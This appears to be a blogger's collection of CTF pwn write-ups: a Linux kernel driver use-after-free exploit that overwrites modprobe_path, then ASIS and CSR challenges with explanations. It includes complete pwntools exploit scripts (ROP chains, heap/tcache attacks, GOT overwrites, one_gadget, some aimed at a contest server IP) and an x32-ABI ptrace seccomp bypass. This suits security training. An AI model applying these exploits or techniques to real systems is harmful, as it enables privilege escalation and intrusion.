    size_t nb_lock[4];
    size_t num_edges;
    struct Link_Header link_header;
    size_t index;
    size_t tra;
};

struct Edge
{
    struct Link_Header link_header;
    struct Node *dst_node;
    size_t weight;
};

static int fd[100];

static void link(int a, int b, unsigned int weight)
{
    // printf("Creating link between '%d' and '%d' with weight %u\n", a, b, weight);
    assert(ioctl(fd[a], SPARK_LINK, fd[b] | ((unsigned long long)weight << 32)) == 0);
}

static void query(int i, int a, int b)
{
    struct spark_ioctl_query qry = {
        .fd1 = fd[a],
        .fd2 = fd[b],
    };
    int ret = ioctl(fd[i], SPARK_QUERY, &qry);
    // printf( "[query] ret = %d\n" , ret );
    // printf("The length of shortest path between '%d' and '%d' is %lld\n", a, b, qry.distance);
}

void get_info(int a)
{
    size_t buf[3];
    memset(buf, 0xcc, sizeof(buf));
    assert(ioctl(fd[a], SPARK_GET_INFO, buf) == 0);
    printf("[get info %d] ", a);
    for (int i = 0; i < 3; ++i)
    {
        printf("%p ", buf[i]);
    }
    puts("");
}

void spark_open(int i)
{
    fd[i] = open("/dev/node", O_RDWR);
    assert(fd[i] >= 0);
}

void spark_close(int i)
{
    close(fd[i]);
}

void spark_finalize(int i)
{
    ioctl(fd[i], SPARK_FINALIZE);
}

// for kmalloc
#include <sys/msg.h>
#include <sys/ipc.h>

struct MsgBuf
{
    long mtype;
    char mtext[0x10000]; // 65536
} msgbuf;

int msg_open()
{
    int qid;
    if ((qid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1)
    {
        perror("msgget");
        exit(1);
    }
    return qid;
}

void msg_send(int qid, char *data, size_t size)
{
    msgbuf.mtype = 1;
    memcpy(msgbuf.mtext, &data[0x30], size - 0x30);
    if (msgsnd(qid, &msgbuf, size - 0x30, 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}

void msg_free(int qid, size_t size)
{
    msgbuf.mtype = 1;
    if (msgrcv(qid, &msgbuf, size - 0x30, 1, 0) == -1)
    {
        perror("msgrcv");
        exit(1);
    }
}

void arb_write(int qid, size_t off)
{
    struct Node data = {
        .index = off,
    };

    // change content
    msg_free(qid, 0x80);
    msg_send(qid, &data, 0x80);

    query(20, 20, 22);
}

void crash()
{
    puts("[+] Crashing...");
    spark_open(0);
    spark_open(1);
    link(0, 1, 0);
    spark_close(1);
    spark_finalize(0);
}

size_t kernel_stack, kernel_heap;

void leak()
{
    int pid = fork();
    if (pid == 0)
    {
        crash();
        exit(1);
    }
    sleep(1); // sleep() takes whole seconds; sleep(0.5) would not wait at all
    printf("[+] get info from dmesg\n");

    int i, sz;
    char *buf;
    //*query the size of the kernel ring buffer
    sz = klogctl(10, NULL, 0);
    assert(sz != -1);
    buf = malloc(sz);
    //*read all message from the kernel buffer into @buf.
    assert(klogctl(3, buf, sz) != -1);
    // size_t kernel_heap, kernel_stack;
    for (i = 0; i < sz && (!kernel_stack || !kernel_heap); i++)
    {
        //*RSP gives an address on the kernel stack
        if (!kernel_stack && !strncmp(buf + i, "RSP: 0018:", 10))
        {
            if (sscanf(buf + i + 10, "%lx", &kernel_stack) != 1)
                kernel_stack = 0;
        }
        //*RBX is taken as a kernel heap address
        if (!kernel_heap && !strncmp(buf + i, "RBX: ", 5))
        {
            if (sscanf(buf + i + 5, "%lx", &kernel_heap) != 1)
                kernel_heap = 0;
        }
    }
    assert(kernel_stack && kernel_heap);
    free(buf);

    printf("[+] Leak kernel stack addr: %p\n", kernel_stack);
    printf("[+] Leak kernel heap addr: %p\n", kernel_heap);
}

/*
0xffff98d5cdd2be80:	0xffffffffffffffff	0x000000000088770f
0xffff98d5cdd2be90:	0x000000000088770e	0x000000000088770d
0xffff98d5cdd2bea0:	0x000000000088770c	0x000000000088770b
0xffff98d5cdd2beb0:	0x000000000088770a	0x0000000000887709
0xffff98d5cdd2bec0:	0x0093037d5f064f38	0x0000000000887707
0xffff98d5cdd2bed0:	0x0000000000887706	0x0000000000887705
0xffff98d5cdd2bee0:	0x0000000000887704	0x0000000000887703
0xffff98d5cdd2bef0:	0x0000000000887702	0x0000000000887701
0xffff98d5cdd2bf00:	0x0000000000000000	0x0000000000000000
*/

void shellcode();

#define target_area_size 0x1000000
size_t cushion[target_area_size];

int main(int argc, char **argv)
{
    // size_t kernel_heap = strtoull(argv[1],0,16);    // input RBX by hand
    leak(); // change to better way for leak

    struct Node node = {
        .id = 0xffffffffffff,
        .refcount = 0,
        .state_lock = {0},
        .finalized = 1,
        .nb_lock = {0},
        .num_edges = 1,
        .link_header.fd = 0x1111,
        .link_header.bk = 0x2222,
        .index = 0x6666,
        .tra = 0,
    };

    size_t *fake_node = &node;

    for (int i = 0; i < 0x10; i++)
        spark_open(i);
    for (int i = 1; i < 0x10; ++i)
        link(0, 0x10 - i, fake_node[0x10 - i]);

    spark_finalize(0);

    spark_open(20);
    spark_open(21);
    spark_open(22);
    link(20, 22, 0);
    // link( 20 , 21 , 0x7777777 );      // rip
    link(20, 21, shellcode + 4);
    spark_close(21); // free node 21

    query(0, 0, 1); // overwrite node 21

    spark_finalize(20);

    // get UAF node 21
    int qid = msg_open();
    msg_send(qid, &fake_node, 0x80);

    size_t dis_heap_addr = kernel_heap;
    dis_heap_addr &= ~(target_area_size - 1);
    dis_heap_addr -= target_area_size * 2;

    printf("[+] init heap address of distanse array: %p\n", dis_heap_addr);
    printf("[+] cushion addr: %p\n", cushion);
    puts("[+] Searching ...");

    for (int i = 0; i < target_area_size; ++i)
        cushion[i] = 0x7ffffffffffffff;

    // write to userland
    size_t addr = ((size_t)cushion - dis_heap_addr);
    fprintf(stderr, "[+] travsersal addr: %p\n", addr);
    arb_write(qid, addr / 8);

    // find offset
    for (int i = 0; i < target_area_size; ++i)
    {
        if (cushion[i] != 0x7ffffffffffffff)
        {
            printf("[+] Found at idx:%p content:%p addr:%p\n", i, cushion[i], &cushion[i]);
            dis_heap_addr += i * 8;
            printf("[+] dis_heap_addr: %p\n", dis_heap_addr);
            break;
        }
    }

    // overwrite the ret address to shellcode().
    size_t kernel_ret_addr = kernel_stack + 0xa0;
    arb_write(qid, (kernel_ret_addr - dis_heap_addr) / 8);

    return 0;
}

void shellcode()
{
    __asm__(
        "mov rdi, [rsp+0x10];"
        "add rdi, 0x11b2097;"
        "mov rsi, 0x792f706d742f;" // "/tmp/y"
        "mov [rdi], rsi;"          // modprobe_path
        "ud2;" ::
            :);
}
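The immediate 0x792f706d742f in the shellcode is the string "/tmp/y" stored as a little-endian 64-bit value. A quick Python check of that encoding (nothing here is specific to the challenge beyond the constant itself):

```python
import struct

IMM = 0x792F706D742F  # constant moved into rsi by the shellcode

# Little-endian bytes of the 64-bit immediate, with trailing NULs stripped.
path = struct.pack("<Q", IMM).rstrip(b"\x00")

# Going the other way: build the immediate from the desired path.
rebuilt = int.from_bytes(b"/tmp/y".ljust(8, b"\x00"), "little")
print(path, hex(rebuilt))
```

Because the value fits in 8 bytes including the terminating NUL, a single mov [rdi], rsi is enough to replace modprobe_path.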

CSR 2021

getstat


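This contest had very few pwn challenges, just enough for show; there were more cry(???) and ethereum ones. One of the rev challenges was even Unity-based, which I can't do either…

Still, reading other people's writeups was quite interesting.

Fairly simple: a shell() function is provided and PIE is off (the exploit uses the fixed address 0x401360). There is a canary but no way to leak it, so it has to be bypassed while still overwriting the return address.

The core issue is an unsigned integer input combined with this snippet: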

.text:0000000000401109                 lea     rax, [rdx*8]
.text:0000000000401111                 and     rax, 0FFFFFFFFFFFFFFF0h
.text:0000000000401115                 sub     rsp, rax

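If rdx is negative (signed and unsigned arithmetic give the same bits), then subtracting it from rsp increases rsp, so the stack shrinks.

Shrink rsp until it sits near the return address, then overwrite the address.

The only new problem was packing an integer into a float in Python. The approach is as follows: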
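The effect of the three instructions on rsp can be modelled in Python with 64-bit wrap-around. This is a sketch of the arithmetic only; the function name and the sample rsp value are made up.

```python
MASK64 = (1 << 64) - 1


def rsp_after_alloca(rsp, rdx):
    """Model: lea rax,[rdx*8]; and rax,~0xf; sub rsp,rax (all modulo 2**64)."""
    rax = (rdx * 8) & MASK64
    rax &= 0xFFFFFFFFFFFFFFF0
    return (rsp - rax) & MASK64


rsp = 0x7FFD00001000  # hypothetical stack pointer

grown = rsp_after_alloca(rsp, 10)             # normal case: stack grows down
shrunk = rsp_after_alloca(rsp, -10 & MASK64)  # count of -10, as sent by the exploit
print(hex(grown), hex(shrunk))
```

With a count of -10 the "allocation" moves rsp up by 0x50 bytes instead of down, which is what brings the buffer next to the saved return address.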

def iToF(i):
  b = struct.pack('q', i)
  return struct.unpack('d', b)[0]
Functions to convert between Python values and C structs.
The optional first format char indicates byte order, size and alignment:
    @: native order, size & alignment (default)
    =: native order, std. size & alignment
    <: little-endian, std. size & alignment
    >: big-endian, std. size & alignment
    !: same as >

The remaining chars indicate types of args and must match exactly;
these can be preceded by a decimal repeat count:
    x: pad byte (no data); c:char; b:signed byte; B:unsigned byte;
    ?: _Bool (requires C99; if not available, char is used instead)
    h:short; H:unsigned short; i:int; I:unsigned int;
    l:long; L:unsigned long; f:float; d:double; e:half-float.
Special cases (preceding decimal count indicates length):
    s:string (array of char); p: pascal string (with count byte).
Special cases (only available in native format):
    n:ssize_t; N:size_t;
    P:an integer type that is wide enough to hold a pointer.
Special case (not in native mode unless 'long long' in platform C):
    q:long long; Q:unsigned long long
Whitespace between formats is ignored.
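One thing worth checking is that the decimal text sent to the program converts back to exactly the same 8 bytes. The sketch below does that round trip in Python, using explicit little-endian formats; it assumes the target parses the text with a correctly rounding routine such as strtod, which is not confirmed by the binary here.

```python
import struct


def iToF(i):
    """Reinterpret a 64-bit integer's bytes as a double."""
    return struct.unpack("<d", struct.pack("<q", i))[0]


addr = 0x401360
text = str(iToF(addr))   # what the exploit sends as a line of input
parsed = float(text)     # stand-in for the target's text-to-double parsing

# The parsed double must have the same bit pattern as the address.
same_bits = struct.pack("<d", parsed) == struct.pack("<q", addr)
print(text, same_bits)
```

Small addresses like this one map to subnormal doubles, so the printed text is a tiny number with a large negative exponent; Python's str() emits enough digits for it to round-trip.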

exp:

from pwn import *
import struct

def iToF(i):
  b = struct.pack('q', i)
  return struct.unpack('d', b)[0]
  
addr = 0x401360

r = process('./getstat')
r.sendlineafter(b':', b'-10')
r.sendlineafter(b':', b'0')
r.sendlineafter(b':', bytes(str(iToF(addr)), 'utf-8'))
r.sendlineafter(b':', b'a')
r.sendline(b'cat /flag')
print(r.clean())

SSE instructions:

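Takeaways:

  • Branch analysis: for example, here an input that is not a valid floating-point number causes a break.
  • Unsigned and signed arithmetic produce the same results at the bit level…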

CSRunner

Just for fun.

ASIS CTF 2021

Justpwnit

no canary PIE.

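Enter a negative number, overwrite rbp with a heap pointer, stack pivot onto the heap, and finally execute exec("/bin/sh\x00", NULL, NULL).

While I was still agonising over system / read & write / sendfile, I found that mov qword ptr [rax], rsi ; ret can also be used to write /bin/sh into the bss segment…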

Abbr

Same as above; worth 71 points, so presumably a little harder.

  • strncasecmp: compare two strings ignoring case.

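Note that a stack pivot can also be done with the xchg instruction… and xchg esp, eax happens to be available. Since PIE is off, 4 bytes are enough to hold addresses in the bss and heap segments.

Another exp, however, takes a long detour and uses printf as an arbitrary read to leak addresses. That is a bit complicated.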

strvec

github src, 114 points

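Finding the bug was basically fuzzing with a human brain…

All protections are enabled. The general approach again comes from someone else's writeup…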

Vulnerability

It is an integer overflow in the code below, which allows a very large vec->size together with a very small malloc(size).

vector *vector_new(int nmemb) {
  if (nmemb <= 0)
    return NULL;
  int size = sizeof(vector) + sizeof(void*) * nmemb;    //8+8*n = 8*(n+1)
                                                        //0x40000004
  vector *vec = (vector*)malloc(size);
  if (!vec)
    return NULL;
  memset(vec, 0, size);
  vec->size = nmemb;
  return vec;
}

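With this, get and set are effectively unbounded within a certain range, although get can only reach addresses from the heap onward. That seems to leave only the heap…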
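The truncation in vector_new can be reproduced in Python by emulating the conversion to a 32-bit int. This is a sketch under the assumptions stated in the code comment above (sizeof(vector) == 8, 8-byte pointers); the helper names are invented.

```python
def to_int32(x):
    """Emulate storing a value in a 32-bit signed int."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x & 0x80000000 else x


def vector_alloc_size(nmemb, header=8, ptr=8):
    """size = sizeof(vector) + sizeof(void*) * nmemb, truncated to int."""
    return to_int32(header + ptr * nmemb)


honest = vector_alloc_size(4)
evil = vector_alloc_size(0x40000004)
print(hex(honest), hex(evil))
```

Both requests end up as malloc(0x28), but in the second case vec->size is 0x40000004, so index checks against size pass for almost any offset past the tiny allocation.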

Leak heap address

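At this point get provides an arbitrary read. It can leak a heap address by reading the tcache list pointer of a freed chunk.

And then? I had no idea and was stuck for a long time. I had not realised how little experience I have: I knew the next step was to leak libc but could not work out how.

OK, now I have figured it out: forge a chunk, free it so that it goes into the unsorted bin, then read its fd pointer to obtain libc_base.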

Arbitrary write

方法是释放tcache struct, 放到unsorted bin中, 方法是先填满0x290大小的tcache链表, 使得再次free tcache struct的时候可以进入unsorted bin, 进而让fd和bk指针覆盖0x30的count变成一个很大的数值, 使得可以在tcache链上malloc任意数量的伪造的tcache fd指针, 最终分配到__malloc_hook, 实现修改下一次malloc时的流程控制.

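What held me up for a while: I almost forgot that freeing the 0x420 chunk attempts to consolidate with its neighbours. The size 0x421 (PREV_INUSE set) blocks backward consolidation, and the in-use bit that describes nextchunk (the PREV_INUSE bit stored in the chunk after it) must also be set to block forward consolidation.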

Pop a shell

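ROP is possible, but the canary gets in the way: the stack address and the canary value must be known first.

A simpler way is to go through the one_gadget results one by one and check whether any gadget's constraints are satisfied; then it is enough to overwrite __malloc_hook with that gadget's address.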

from pwn import *
binary = './strvec.elf64'
libc = ELF('./libc-2.31.so')
context.binary = binary
context.log_level = 'debug'
ss=lambda x:p.send(x)       #send string
sl=lambda x:p.sendline(x)
ru=lambda x:p.recvuntil(x)
rl=lambda :p.recvline()
ra=lambda :p.recv()         #recv one
rn=lambda x:p.recv(x)       #recv n
sa=lambda x,y:p.sendafter(x,y)
sla=lambda x,y:p.sendlineafter(x,y)
itt=lambda :p.interactive()
c = 1
if c == 0:
    p = remote("chall.rumble.host", 5415)
else:
    p = process(binary, aslr=False)

def get(idx:int) -> int:
    sla(b'> ', b'1')
    sla(b'idx =', str(idx).encode())
    ru(b'-> ')
    data = p.recvline(False)
    if b'[undefined]' in data:
        log.error(f'get idx:{idx} [undefined]')
    data = u64(data.ljust(8, b'\x00'))
    return data

def set(idx:int, data:bytes=b'\x00'):
    sla(b'> ', b'2')
    sla(b'idx =', str(idx).encode())
    sa(b'data = ', data[:-1] if len(data)==0x20 else data+b'\n')
    rl()

def initial():
    sl(b'Yogdzewa')
    sl(str(0x40000004).encode())


initial()
set(5, p64(0)+b'b'*0x18)
chunk1_addr = get(5)
log.success(f'data is: 0x{chunk1_addr:x}')

set(5, flat([0, 0x421]))
set(7, flat([chunk1_addr+0x40, chunk1_addr+0x40], 0, 0))

#gdb.attach(p)
for i in range(5):
    for j in range(4):
        log.success(f'idx is: {17+j+i*6}')
        set(17+j+i*6, b'\x00')
set(0)
#the nextchunk header set
set(1, flat([0, 0x31]))

gdb.attach(p)
#this will malloc a chunk first, so that puts a chunk between
#top chunk and freed one. Will not get into **consolidate forward**
set(5, flat([0, 0x31]))
fd_ptr = get(6)
log.success(f'fd_ptr is: 0x{fd_ptr:x}')
libc.address = fd_ptr - 0x1ebbe0
log.success(f'libc_base is: 0x{libc.address:x}')

# work-in-progress





itt()

ASIS CTF 2022

babyscan-1

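Unintended solution: %0s is equivalent to no length limit. In addition, alloca does not move rsp here, so the input directly overwrites the stack. From r3kapig.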

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/ASIS/babyscan/bin/chall')
r = remote('65.21.255.31',13370)
elf = ELF('/mnt/hgfs/ubuntu/ASIS/babyscan/bin/chall')
libc = ELF('/mnt/hgfs/ubuntu/ASIS/babyscan/lib/libc.so.6')

# gdb.attach(r)
r.recvuntil(b"size: ")
r.sendline(str(0).encode())

r.recvuntil(b"data: ")
pop_rdi = 0x0000000000401433

payload = b'a'*0x48+p64(pop_rdi)+p64(elf.got["alarm"])+p64(elf.plt["puts"])+p64(0x401130) # _start
r.sendline(payload)
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))-libc.sym["alarm"]
r.recvuntil(b"size: ")
r.sendline(str(0).encode())
r.recvuntil(b"data: ")
ogg = libc_base+0xe3b01	# found with one_gadget
r.sendline(b'a'*0x48+p64(ogg))


r.interactive()

babyscan-2

src:

#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
  char size[16], fmt[8], *buf;

  printf("size: ");
  scanf("%15s", size);
  if (!isdigit(*size)) {
    puts("[-] Invalid number");
    exit(1);
  }

  buf = (char*)malloc(atoi(size) + 1);

  printf("data: ");
  snprintf(fmt, sizeof(fmt), "%%%ss", size); //vuln is here
  scanf(fmt, buf);

  exit(0);
}

__attribute__((constructor))
void setup(void) {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  alarm(180);
}
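
How the size field turns into the scanf format can be sketched in a few lines. This is a rough model of snprintf(fmt, sizeof(fmt), "%%%ss", size), assuming an 8-byte fmt buffer as in the source; the function name is illustrative.

```python
def build_scanf_format(size_field: bytes, fmt_len: int = 8) -> bytes:
    """Model snprintf(fmt, fmt_len, "%%%ss", size): C-string semantics plus truncation."""
    c_string = size_field.split(b'\x00', 1)[0]  # %s stops at the first NUL byte
    full = b'%' + c_string + b's'
    return full[:fmt_len - 1]                   # snprintf keeps room for the terminator

if __name__ == '__main__':
    print(build_scanf_format(b'0'))                              # width 0
    print(build_scanf_format(b'9$' + b'\x00' * 6 + b'A' * 7))    # positional argument
    print(build_scanf_format(b'123456789'))                      # trailing 's' truncated
```

The first case is the babyscan-1 input and the second is the shape of the Lotus_write input used for babyscan-2, where the bytes after the NUL stay in the size buffer on the stack.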

exp: from r3kapig-Lotus

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/ASIS/babyscan2/bin/chall')
#r = remote('65.21.255.31',33710)
elf = ELF('/mnt/hgfs/ubuntu/ASIS/babyscan2/bin/chall')
libc = ELF('/mnt/hgfs/ubuntu/ASIS/babyscan2/lib/libc.so.6')

def Lotus_write(addr,content):
    r.recvuntil(b"size: ")
    r.send(b'9$\x00\x00\x00\x00\x00\x00'+p64(addr)[:7])
    r.recvuntil(b"data: ")
    r.sendline(content)

# gdb.attach(r,'b *0x40132b')
# gdb.attach(r,'b *0x401286')
# Lotus_write(elf.got["atoi"],p64(elf.plt["printf"])+p64(0x401140)+p64(0x401256)[:7])
Lotus_write(elf.got["exit"],p64(0x401256)[:7])
# gdb.attach(r,'b *0x40128B')
# r.recvuntil(b"size: ")
# r.sendline(b'%p')

# print(hex(elf.plt["atoi"]))
Lotus_write(elf.got["atoi"],p64(elf.plt["printf"])[:7])
# gdb.attach(r,'b *0x4012CD')

r.recvuntil(b"size: ")
r.sendline(b'1-%9$p+')
r.recvuntil(b'-')
libc_base = int(r.recvuntil(b'+')[:-1],16)-0x9A154
r.recvuntil(b"data: ")
r.sendline(b'a')
ogg = libc_base+0xe3b01
Lotus_write(elf.got["printf"],p64(ogg)[:7])
# gdb.attach(r)
# r.recvuntil(b"size: ")
# r.sendline(b'15')

log.success("libc_base: "+hex(libc_base))
r.interactive()

readable

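I finally figured out how this challenge environment is meant to be used: first run build.sh to compile, then docker build. deploy.py contains a socat command that opens a local port to receive the exploit file and saves it as a tempfile, which is mapped into the container as /tmp/exploit. The container is then started, and once permissions are set up it runs /home/pwn/run. run installs seccomp and then execve's the exploit; how to get at readme from there is up to us.

solution 1

Use the x32 ABI to call ptrace directly, take the PIE base address from an mmap call, and hijack a write to leak it: the address seen during the mmap system call is used to print the first 0x2000 bytes, which immediately reveals the flag.

Doesn't this need to be compiled as 32-bit? I tried: it still has to be 64-bit.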

#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
#include <sys/personality.h>
#include <sys/user.h>
#include <sys/mman.h>
unsigned long long base = 0;
struct user_regs_struct *regs = NULL;

int main(int argc, char *argv[])
{   
    // The x32 ABI requires pointers to fit in 32 bits
    regs = mmap((void *)0x233000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
    pid_t traced_process;
    long ins;
    char *argvs[] = {"/home/pipe/readme",NULL};
    int pid = fork();
    if (pid == 0) {
        // ptrace(PTRACE_TRACEME, 0, 0, 0);
        syscall(0x40000209,PTRACE_TRACEME, 0, 0, 0);
        execve("/home/pipe/readme", argvs, NULL);
        puts("exec failed");
        return -1;
    }
    wait(NULL);
    while (1) {
        int blocked = 0;
        // Wait until the child makes a syscall
        // ptrace(PTRACE_SYSCALL, pid, 0, 0);
        syscall(0x40000209,PTRACE_SYSCALL, pid, 0, 0);
        
        waitpid(pid, 0, 0);
        
        // ptrace(PTRACE_GETREGS, pid, 0, &regs);
        syscall(0x40000209,PTRACE_GETREGS, pid, 0, regs);
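        // Get the program base address; the signature was found locally with strace
        // (note: nr 10 is mprotect on x86-64, mmap is 9, so rdi is an address inside the mapping)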
        if(regs->orig_rax == 10 && regs->rsi==0x1000)
        {
            printf("Mmap Rdi:%08llx\nMmap Rsi:%08llx\nMmap Rdx:%08llx\n",regs->rdi,regs->rsi,regs->rdx);
            base = regs->rdi;
        }
        // Hijack any write syscall: point rsi at the base address and enlarge rdx
        if (regs->orig_rax == 1 && regs->rdx == 0x10) {
            blocked = 1;
            printf("Rsi before:%08llx\n",regs->rsi);
            regs->rdx = 0x2000;
            regs->rsi = base;
            printf("Rsi after:%08llx\n",regs->rsi);
            // ptrace(PTRACE_SETREGS, pid, 0, regs);
            syscall(0x40000209,PTRACE_SETREGS, pid, 0, regs);
        }
        // Continue on with the now blocked syscall
        // ptrace(PTRACE_SYSCALL, pid, 0, 0);
        syscall(0x40000209,PTRACE_SYSCALL, pid, 0, 0);

        waitpid(pid, 0, 0);
        // If the program checks return value of the write, we need to make sure that the return value isn't `-ENOSYS`
        // if (blocked) {regs->rax = 1; ptrace(PTRACE_SETREGS, pid, 0, regs); }
        if (blocked) {regs->rax = 1; syscall(0x40000209,PTRACE_SETREGS, pid, 0, regs); break;}
    }
    return 0;
}

The actual syscall numbers are defined in /usr/include/x86_64-linux-gnu/asm/unistd_x32.h:

#ifndef _ASM_X86_UNISTD_X32_H
#define _ASM_X86_UNISTD_X32_H 1

#define __NR_read (__X32_SYSCALL_BIT + 0)
#define __NR_write (__X32_SYSCALL_BIT + 1)
#define __NR_open (__X32_SYSCALL_BIT + 2)
...
#define __NR_ioctl (__X32_SYSCALL_BIT + 514)
#define __NR_readv (__X32_SYSCALL_BIT + 515)
#define __NR_writev (__X32_SYSCALL_BIT + 516)
#define __NR_recvfrom (__X32_SYSCALL_BIT + 517)
#define __NR_sendmsg (__X32_SYSCALL_BIT + 518)
#define __NR_recvmsg (__X32_SYSCALL_BIT + 519)
#define __NR_execve (__X32_SYSCALL_BIT + 520)
#define __NR_ptrace (__X32_SYSCALL_BIT + 521)
...
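  • __X32_SYSCALL_BIT is 0x40000000, which explains the numbers used above.

  • The difference between int 0x80 and syscall (which, admittedly, has little to do with this).

  • The key point is that x86-64 has an x32 ABI mode, which reduces pointer and address-space overhead while still using the extra registers and execution units of a 64-bit CPU, making programs faster. Its system calls are as shown above: just add a constant to the number, or equivalently OR it in (|). Pointers are kept as 32-bit values with the upper 32 bits of the register cleared, which emulates 32-bit operation.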
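
As a quick check of the arithmetic, the 0x40000209 constant used in the exploit can be recomputed from the header excerpt. The table below copies only a few offsets shown above; the names X32_OFFSETS and x32_syscall_nr are illustrative.

```python
X32_SYSCALL_BIT = 0x40000000

# Offsets copied from the unistd_x32.h excerpt above (not a complete table)
X32_OFFSETS = {
    'read': 0,
    'write': 1,
    'open': 2,
    'ioctl': 514,
    'execve': 520,
    'ptrace': 521,
}

def x32_syscall_nr(name: str) -> int:
    """Return the x32 syscall number: the x32 bit OR'ed with the table offset."""
    return X32_SYSCALL_BIT | X32_OFFSETS[name]

if __name__ == '__main__':
    print(hex(x32_syscall_nr('ptrace')))
```

Because the offsets are far below 0x40000000, adding the bit and OR-ing it give the same result.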

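I hadn't run it yet. The next day I spent an hour on the environment without success, so Docker it is. At least I finally understood how all these pieces fit together.

But why doesn't it just work? It looks fine, yet every ptrace call seems to fail and regs contains nothing.

I also don't yet know how to debug a program running inside Docker.

ptrace really did fail: it returned -1. Checking errno shows "not implemented" (ENOSYS). No idea why, so I asked my teammates.

crazyman said it works on Ubuntu 18, but switching the Docker image to 18.04 did not help. Hmm, shouldn't it?

On 22/11/14, while compiling Linux, I noticed an option named x32 ABI for 64-bit mode, enabled it, rebuilt, and tried running the exploit.

I changed the HOME path, recompiled readme as a static binary, placed it in HOME as read-only for other users, and ignored run.c (it only restricts the available system calls).

There were still plenty of problems.

  • A busybox-based Linux is quite limited: every file has to be statically linked, so readme, originally PIE, became a static binary. The mmap call then seems to disappear, ptrace cannot intercept it at all (???), and there is no strace to see what is going on.
  • Static linking also makes the file much larger, so dumping only the first 0x2000 bytes is not enough and needs adjusting.

The good news is that the method does work. The kernels I ran Docker on apparently lacked this option, while the contest environment presumably had it. That would also explain why the same Dockerfile behaves differently: a container uses the host's kernel, so x32 support depends on the host kernel configuration.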

solution 2 - intended one

given by the author

In the author's words:
  • Intended way was using seccomp unotify to change libc binary
  • Linker loads libc, you set a hook for openat. And then use seccomp_setfd to send a poisoned libc

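seccomp unotify (user notification): lets a syscall be handed, together with its details, to a supervisor (usually a container manager), which decides whether the syscall continues or is stopped and returns a chosen value.

Flow:
  • solve.py uploads the exploit; inside Docker the exploit then receives the payload and stores it at /tmp/payload.
  • The exploit uses a UNIX domain socket as the inter-process channel.
  • It installs a SIGCHLD handler; the handler simply exits.
  • It forks a child, which calls prctl, installs the seccomp unotify filter, sends the notify fd to the parent over the socket, and then executes /home/pwn/readme.
    The installed rule mainly attaches unotify to openat.
  • (The rest is the standard unotify supervisor flow.)
  • The parent receives the unotify fd over the socket. (This part is long and uses recvmsg and other odd functions; skipping it.)
  • The parent waits on the fd with ioctl. When readme calls openat it is interrupted; the parent opens the payload file and uses seccomp_notif_addfd to duplicate that fd into the child's fd table. The ioctl returns the fd number finally opened in the child, and the response sets the return value of the openat syscall to that fd number.
  • The above is an infinite loop; it ends when the child exits and the signal handler terminates everything.
Key points:
  • UNIX domain socket or IPC socket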
#include <sys/socket.h>
sockfd = socket(int socket_family, int socket_type, int protocol);

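Here socket_family=AF_UNIX, and socket_type is one of SOCK_STREAM, SOCK_DGRAM, or SOCK_SEQPACKET (stream, datagram, and sequenced-packet semantics).

The sendfd and recvfd functions are built on sendmsg and recvmsg with SCM_RIGHTS ancillary data… I can't follow all the macro definitions; it is enough to know that a file descriptor can be passed over a socket fd.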
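
The same fd-passing mechanism is easier to read in Python. The sketch below mirrors the SCM_RIGHTS pattern from the Python socket documentation rather than the exploit itself; the function names and the pipe-based demo are illustrative, and it assumes a Unix-like system.

```python
import array
import os
import socket

def send_fd(sock: socket.socket, fd: int) -> None:
    """Send one file descriptor as SCM_RIGHTS ancillary data."""
    payload = array.array('i', [fd]).tobytes()
    # At least one byte of real data must accompany the ancillary data
    sock.sendmsg([b'x'], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, payload)])

def recv_fd(sock: socket.socket) -> int:
    """Receive one file descriptor sent with send_fd()."""
    fds = array.array('i')
    _msg, ancdata, _flags, _addr = sock.recvmsg(1, socket.CMSG_LEN(fds.itemsize))
    for level, ctype, data in ancdata:
        if level == socket.SOL_SOCKET and ctype == socket.SCM_RIGHTS:
            fds.frombytes(data[:len(data) - (len(data) % fds.itemsize)])
            return fds[0]
    raise OSError('no file descriptor received')

def pass_pipe_through_socketpair() -> bytes:
    """Demo: pass the read end of a pipe over a socketpair and read through the copy."""
    left, right = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    read_end, write_end = os.pipe()
    try:
        send_fd(left, read_end)
        received = recv_fd(right)
        os.write(write_end, b'hello')
        data = os.read(received, 5)
        os.close(received)
        return data
    finally:
        os.close(read_end)
        os.close(write_end)
        left.close()
        right.close()

if __name__ == '__main__':
    print(pass_pipe_through_socketpair())
```

The received descriptor is a new number in the receiver that refers to the same open file, which is what lets the supervisor obtain the notification fd created in the child.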

  • seccomp unotify: seccomp(SECCOMP_SET_MODE_FILTER, SECCOMP_FILTER_FLAG_NEW_LISTENER, &prog);

Because glibc provides no wrapper for seccomp, the call is actually:

static int seccomp(unsigned int operation, unsigned int flags, void *args){
  return syscall(__NR_seccomp, operation, flags, args); }

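The first argument, SECCOMP_SET_MODE_FILTER, means that args is treated as a pointer to a BPF program defining a filter. The filter is preserved across fork, clone, and execve. The calling thread must either have CAP_SYS_ADMIN in its namespace or already have the no_new_privs bit set.

The latter is the usual route, set with prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0). With these arguments, execve can no longer grant privileges through set-user-ID programs. Without this requirement, an unprivileged process could install a filter that makes setuid() return 0 without doing anything and then execve a set-user-ID program, which would go on running malicious commands without ever really dropping privileges.

The second argument, flags, must be SECCOMP_FILTER_FLAG_NEW_LISTENER, so that a successful install returns a new user-space notification file descriptor (with the close-on-exec flag set). When the filter returns SECCOMP_RET_USER_NOTIF, a notification is sent to that fd. A thread can install at most one filter with this flag.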

  • SECCOMP_IOCTL_NOTIF_ADDFD

The SECCOMP_IOCTL_NOTIF_ADDFD operation (available since Linux 5.9) allows the supervisor to install a file descriptor into the target's file descriptor table.

